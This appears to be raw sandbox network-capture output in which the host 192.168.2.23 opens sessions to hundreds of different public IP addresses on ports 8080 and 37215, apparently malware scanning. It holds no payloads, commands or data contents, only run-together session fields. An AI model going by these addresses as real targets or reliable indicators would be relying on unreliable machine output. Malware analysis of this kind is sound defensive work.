                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18039192.168.2.235340041.60.41.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18040192.168.2.2341398176.50.254.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18041192.168.2.2337860107.181.144.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18042192.168.2.2359832208.12.61.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18043192.168.2.2348880106.59.70.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18044192.168.2.2359650114.168.25.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18045192.168.2.2346032124.155.110.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18046192.168.2.235779446.237.38.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18047192.168.2.2334604130.128.157.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18048192.168.2.2351258183.243.206.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18049192.168.2.2350058144.82.50.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18050192.168.2.235353258.117.69.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18051192.168.2.2333976209.76.205.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18052192.168.2.233347081.119.109.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18053192.168.2.2341058204.127.245.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18054192.168.2.2347622101.114.12.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18055192.168.2.234713841.85.173.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18056192.168.2.235037873.185.141.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18057192.168.2.2360064165.123.224.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18058192.168.2.2341446154.249.184.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18059192.168.2.2346342124.137.11.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18060192.168.2.233638434.214.133.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18061192.168.2.2342790203.141.5.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18062192.168.2.235541462.203.100.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18063192.168.2.235123650.158.255.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18064192.168.2.236036462.230.63.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18065192.168.2.235191672.252.245.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18066192.168.2.234665061.177.224.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18067192.168.2.233316673.5.51.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18068192.168.2.2340294158.50.43.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18069192.168.2.2334734121.120.210.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18070192.168.2.2351114146.186.246.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18071192.168.2.235866419.7.117.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18072192.168.2.2346236151.166.216.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18073192.168.2.2358240119.103.139.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18074192.168.2.2334184155.176.59.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18075192.168.2.2358692165.213.175.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18076192.168.2.2345966171.37.63.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18077192.168.2.234282477.191.198.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18078192.168.2.23568428.188.142.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18079192.168.2.235543848.214.9.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18080192.168.2.2336748121.92.131.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18081192.168.2.2333914120.246.104.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18082192.168.2.2343008136.87.250.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18083192.168.2.234579824.139.124.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18084192.168.2.2350276160.20.80.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18085192.168.2.236086859.42.185.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18086192.168.2.235159685.184.56.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18087192.168.2.233513841.133.146.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18088192.168.2.233600284.41.52.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18089192.168.2.2350500128.144.23.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18090192.168.2.2334250223.8.216.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18091192.168.2.233789865.139.237.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18092192.168.2.23587045.165.60.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18093192.168.2.2351274166.62.173.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18094192.168.2.2339062195.249.146.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18095192.168.2.235365286.172.232.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18096192.168.2.2342728190.201.204.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18097192.168.2.233639687.151.20.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18098192.168.2.2360748183.51.201.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18099192.168.2.2352760200.16.131.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18100192.168.2.2346778117.107.130.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18101192.168.2.2350432171.217.56.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18102192.168.2.2356174219.159.244.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18103192.168.2.2342154193.175.93.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18104192.168.2.2352530170.218.80.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18105192.168.2.235847887.61.0.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18106192.168.2.236043687.67.122.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18107192.168.2.2354434144.159.49.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18108192.168.2.2348210170.202.244.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18109192.168.2.233762880.125.147.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18110192.168.2.235433498.239.236.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18111192.168.2.2344622184.142.244.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18112192.168.2.2339658202.56.173.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18113192.168.2.235788857.64.206.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18114192.168.2.235920861.163.230.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18115192.168.2.235846871.55.156.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18116192.168.2.2346512148.133.137.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18117192.168.2.2336048211.172.45.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18118192.168.2.234145041.170.73.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18119192.168.2.235557084.245.40.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18120192.168.2.235026685.230.195.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18121192.168.2.2342616126.160.68.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18122192.168.2.2343434145.212.13.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18123192.168.2.234943617.171.98.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18124192.168.2.2346888178.51.100.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18125192.168.2.2348140205.34.201.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18126192.168.2.2354572130.188.191.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18127192.168.2.236055274.178.40.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18128192.168.2.2348534116.42.19.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18129192.168.2.2340264137.74.85.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18130192.168.2.2358436182.129.92.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18131192.168.2.2352652126.122.126.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18132192.168.2.235387890.153.75.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18133192.168.2.234492045.243.13.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18134192.168.2.2345536170.135.123.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18135192.168.2.2355840160.4.129.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18136192.168.2.233879612.193.66.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18137192.168.2.2348388135.14.247.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18138192.168.2.2350032171.61.82.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18139192.168.2.2346408216.106.6.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18140192.168.2.234046093.230.4.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18141192.168.2.234749076.195.104.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18142192.168.2.235852487.122.32.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18143192.168.2.234725419.95.143.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18144192.168.2.2347072135.36.25.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18145192.168.2.2339432221.99.43.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18146192.168.2.2338642212.142.72.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18147192.168.2.2360072119.108.20.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18148192.168.2.2334778222.89.35.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18149192.168.2.2352932193.184.219.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18150192.168.2.2357488169.67.40.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18151192.168.2.234197277.119.170.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18152192.168.2.2350542125.161.127.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18153192.168.2.2354704101.110.65.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18154192.168.2.2346938169.76.215.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18155192.168.2.2343924205.116.238.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18156192.168.2.2360242184.91.167.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18157192.168.2.233351463.246.8.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18158192.168.2.2350200109.132.58.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18159192.168.2.2360130104.157.125.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18160192.168.2.234830234.20.65.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18161192.168.2.235120244.194.198.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18162192.168.2.2359726208.163.185.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18163192.168.2.235676451.43.133.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18164192.168.2.2360050124.93.127.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18165192.168.2.234906623.250.129.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18166192.168.2.235841835.90.1.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18167192.168.2.234299245.196.143.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18168192.168.2.2342718123.193.32.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18169192.168.2.233300090.17.174.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18170192.168.2.2345160126.108.98.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18171192.168.2.2360630101.94.12.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18172192.168.2.233409876.27.165.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18173192.168.2.233628043.48.121.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18174192.168.2.2338356209.0.16.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18175192.168.2.2360570204.22.252.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18176192.168.2.234124649.15.239.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18177192.168.2.233323049.160.113.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18178192.168.2.2334746110.1.85.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18179192.168.2.235802245.5.137.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18180192.168.2.233699885.134.168.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18181192.168.2.2358268183.8.71.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18182192.168.2.2336228149.214.32.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18183192.168.2.2353090212.19.157.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18184192.168.2.235245612.247.28.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18185192.168.2.234824065.112.191.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18186192.168.2.235632663.202.93.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18187192.168.2.2349372192.119.62.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18188192.168.2.2351908140.152.65.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18189192.168.2.2345574207.77.50.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18190192.168.2.235929224.216.123.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18191192.168.2.2333598206.236.87.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192192.168.2.23350641.190.255.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18193192.168.2.2339130218.200.94.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18194192.168.2.233465290.239.118.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18195192.168.2.2336122108.221.58.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18196192.168.2.2346500131.253.234.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18197192.168.2.2350936158.137.48.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18198192.168.2.2340630176.33.199.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18199192.168.2.2351678118.233.166.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18200192.168.2.234055698.168.168.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18201192.168.2.2349628159.176.75.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18202192.168.2.233628846.168.242.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18203192.168.2.233447288.202.219.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18204192.168.2.2352682116.95.111.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18205192.168.2.233535241.19.33.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18206192.168.2.234358896.10.71.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18207192.168.2.2333920204.18.195.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18208192.168.2.235711212.104.45.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18209192.168.2.235376292.98.203.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18210192.168.2.234691669.86.28.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18211192.168.2.2347118137.247.244.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18212192.168.2.235225886.77.60.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18213192.168.2.2360622193.123.235.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18214192.168.2.2347364193.218.3.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18215192.168.2.2358080145.61.217.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18216192.168.2.233739859.163.239.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18217192.168.2.235139498.196.78.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18218192.168.2.233575850.126.114.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18219192.168.2.235697677.30.236.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18220192.168.2.2334752180.104.154.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18221192.168.2.2358048193.210.196.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18222192.168.2.2344564199.2.121.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18223192.168.2.2336668107.49.18.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18224192.168.2.2359404101.214.145.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18225192.168.2.234685885.167.177.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18226192.168.2.2355586173.82.85.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18227192.168.2.23378341.247.7.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18228192.168.2.235654699.214.44.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18229192.168.2.2352692156.114.229.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18230192.168.2.2347142105.255.50.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18231192.168.2.2347464161.185.155.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18232192.168.2.2338684137.171.204.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18233192.168.2.234944280.222.218.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18234192.168.2.2357682197.43.177.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18235192.168.2.2338460197.225.235.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18236192.168.2.2333782141.181.42.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18237192.168.2.235824841.213.30.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18238192.168.2.2342982157.33.72.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18239192.168.2.234883041.248.251.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18240192.168.2.2354390197.13.190.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18241192.168.2.234275041.182.221.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18242192.168.2.235079441.229.61.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18243192.168.2.2352468197.25.182.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18244192.168.2.2342972157.227.250.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18245192.168.2.235680457.86.38.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18246192.168.2.233366441.241.193.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18247192.168.2.2350962157.241.40.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18248192.168.2.2341484197.94.191.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
